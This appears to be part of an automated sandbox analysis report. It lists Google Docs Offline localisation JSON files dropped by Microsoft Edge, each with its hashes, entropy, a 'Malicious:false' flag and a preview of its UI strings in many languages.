                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):994
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                  MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                  SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                  SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                  SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2091
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                  MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                  SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                  SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                  SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2778
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                  MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                  SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                  SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                  SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1719
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                  MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                  SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                  SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                  SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):936
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                  MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                  SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                  SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                  SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3830
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                  MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                  SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                  SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                  SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                  MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                  SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                  SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                  SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                  MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                  SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                  SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                  SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):878
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                  MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                  SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                  SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                  SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2766
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                  MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                  SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                  SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                  SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):978
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                  MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                  SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                  SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                  SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):907
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                  MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                  SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                  SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                  SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                  MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                  SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                  SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                  SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):937
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686555713975264
